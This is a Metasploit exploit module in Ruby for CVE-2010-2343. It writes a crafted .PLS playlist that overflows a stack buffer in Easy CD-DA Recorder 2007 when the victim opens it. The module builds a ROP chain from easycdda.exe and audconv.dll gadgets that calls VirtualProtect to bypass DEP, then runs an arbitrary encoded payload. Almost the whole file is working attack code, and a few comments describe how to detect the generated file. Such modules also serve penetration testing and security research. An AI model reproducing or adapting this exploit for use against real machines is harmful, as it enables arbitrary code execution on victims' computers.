##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require
'msf/core'
# File-format exploit module for Easy CD-DA Recorder 2007 (CVE-2010-2343).
#
# The module does not touch a remote host itself: it writes a single .PLS
# playlist file (FILENAME, default 'msf.pls') whose oversized entry overflows
# a stack buffer when the victim opens it. Control flow is redirected into a
# ROP chain built from easycdda.exe / audconv.dll gadgets (target comment:
# "DEP Bypass"), followed by the encoded payload.
#
# Defender notes, all derived from the construction in #exploit below:
#   * the generated file is dominated by 4-byte little-endian addresses in
#     the 0x0040xxxx / 0x100xxxxx ranges, the payload bytes, and a 10,000-byte
#     run of upper-case letters -- none of which is ordinary playlist text;
#   * the vulnerable components named in the target comment are
#     easycdda.exe 3.0.114.0 and audconv.dll 7.0.815.0, so the ROP addresses
#     are only meaningful for those exact, non-ASLR module builds.
class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::FILEFORMAT

  # Registers module metadata with the framework and the FILENAME option.
  #
  # @param info [Hash] metadata supplied by the framework loader; merged via update_info.
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Easy CD-DA Recorder PLS Buffer Overflow',
      'Description'    => %q{
          This module exploits a stack-based buffer overflow vulnerability
        in Easy CD-DA Recorder 2007, caused by a long string in a playlist entry.
        By persuading the victim to open a specially-crafted .PLS file, a
        remote attacker could execute arbitrary code on the system or cause
        the application to crash. This module has been tested successfully on
        Windows XP SP3 and Windows 7 SP1.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'chap0',        # Vulnerability discovery and original exploit
          'Gabor Seljan', # Metasploit module
          'juan vazquez'  # Improved reliability
        ],
      'References'     =>
        [
          [ 'BID', '40631' ],
          [ 'EDB', '13761' ],
          [ 'OSVDB', '65256' ],
          [ 'CVE', '2010-2343' ],
          [ 'URL', 'http://www.corelan.be:8800/advisories.php?id=CORELAN-10-048' ]
        ],
      'DefaultOptions' =>
        {
          'ExitFunction' => 'process'
        },
      'Platform'       => 'win',
      'Payload'        =>
        {
          'DisableNops'    => true,
          # 0x0a is LF and 0x3d is '='; presumably both would terminate or
          # split the key=value playlist entry -- not verified here.
          'BadChars'       => "\x0a\x3d",
          # Maximum encoded payload size the file layout leaves room for.
          'Space'          => 2454,
          # Moves ESP away from the payload so the decoder stub's own pushes
          # do not overwrite it (per the inline mona.py annotation).
          'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff" # ADD ESP,-3500
        },
      'Targets'        =>
        [
          [ 'Windows XP SP3 / Windows 7 SP1 (DEP Bypass)',
            # easycdda.exe 3.0.114.0
            # audconv.dll 7.0.815.0
            {
              # Bytes from the start of the entry to the saved return address.
              'Offset' => 1108,
              # Gadget that lands execution on the ROP chain: adds 0xC10 to
              # ESP, then returns (per the inline annotation).
              'Ret'    => 0x1001b19b # ADD ESP,0C10 # RETN 0x04 [audconv.dll]
            }
          ]
        ],
      'Privileged'     => false,
      'DisclosureDate' => 'Jun 7 2010',
      'DefaultTarget'  => 0))

    register_options(
      [
        OptString.new('FILENAME', [ false, 'The file name.', 'msf.pls'])
      ], self.class)
  end

  # Returns a 4-byte NOP sequence from make_nops as one unsigned 32-bit
  # little-endian integer ("V" format). Used as the EAX value popped inside
  # the ROP chain in #exploit.
  #
  # @return [Integer] the NOP bytes reinterpreted as a little-endian DWORD
  def nops
    return make_nops(4).unpack("V").first
  end

  # Builds a run of ROP NOPs: n copies of the address of a bare RETN
  # gadget in audconv.dll, packed as little-endian DWORDs.
  #
  # @param n [Integer] number of RETN addresses to emit (default 1)
  # @return [String] n * 4 bytes of packed gadget addresses
  def rop_nops(n = 1)
    # RETN (ROP NOP) [audconv.dll]
    [0x1003d55d].pack('V') * n
  end

  # Assembles the malicious playlist contents and writes them with
  # file_create. Layout, in order:
  #   1. Offset/4 RETN gadgets (padding up to the saved return address),
  #   2. a POP EDI # RET gadget, then target.ret (the ADD ESP / RETN pivot),
  #   3. 22 more RETN gadgets,
  #   4. the mona.py-generated chain below,
  #   5. the encoded payload,
  #   6. 10,000 random upper-case letters to force the overflow/exception.
  #
  # The chain's own annotations show it loading &VirtualProtect from the
  # easycdda.exe IAT and staging register values before a PUSHAD gadget;
  # that is what realises the "DEP Bypass" named in the target.
  def exploit
    # ROP chain generated by mona.py - See corelan.be
    rop_gadgets =
    [
      0x1007261e, # POP EDX # RETN [audconv.dll]
      0x0042a0e0, # &VirtualProtect() [IAT easycdda.exe]
      0x1003bd6b, # MOV EAX,DWORD PTR DS:[EDX] # RETN [audconv.dll]
      0x10035802, # XCHG EAX,ESI # RETN [audconv.dll]
      0x1005d288, # POP EBP # RETN [audconv.dll]
      0x004030c8, # &PUSH ESP # RET 0x08 [easycdda.exe]
      0x1005cc2d, # POP EBX # RETN [audconv.dll]
      0x00000996, # 0x00000996-> EBX
      0x1008740c, # POP EDX # RETN [audconv.dll]
      0x00000040, # 0x00000040-> EDX
      0x1001826d, # POP ECX # RETN [audconv.dll]
      0x004364c6, # &Writable location [easycdda.exe]
      0x00404aa9, # POP EDI # RETN [easycdda.exe]
      0x100378e6, # RETN (ROP NOP) [audconv.dll]
      0x0042527d, # POP EAX # RETN [easycdda.exe]
      nops,       # NOP bytes as a DWORD, supplied by #nops
      0x00429692  # PUSHAD # INC EBX # ADD CL,CH # RETN [easycdda.exe]
    ].flatten.pack('V*')

    # Integer division: 1108 / 4 = 277 RETN addresses of padding.
    sploit = rop_nops(target['Offset'] / 4)
    sploit << [0x1003d55c].pack("V") # pop edi # ret [audconv.dll]
    sploit << [target.ret].pack("V")
    sploit << rop_nops(22)
    sploit << rop_gadgets
    sploit << payload.encoded
    sploit << rand_text_alpha_upper(10000) # Generate exception

    # Create the file
    print_status("Creating '#{datastore['FILENAME']}' file ...")
    file_create(sploit)
  end
end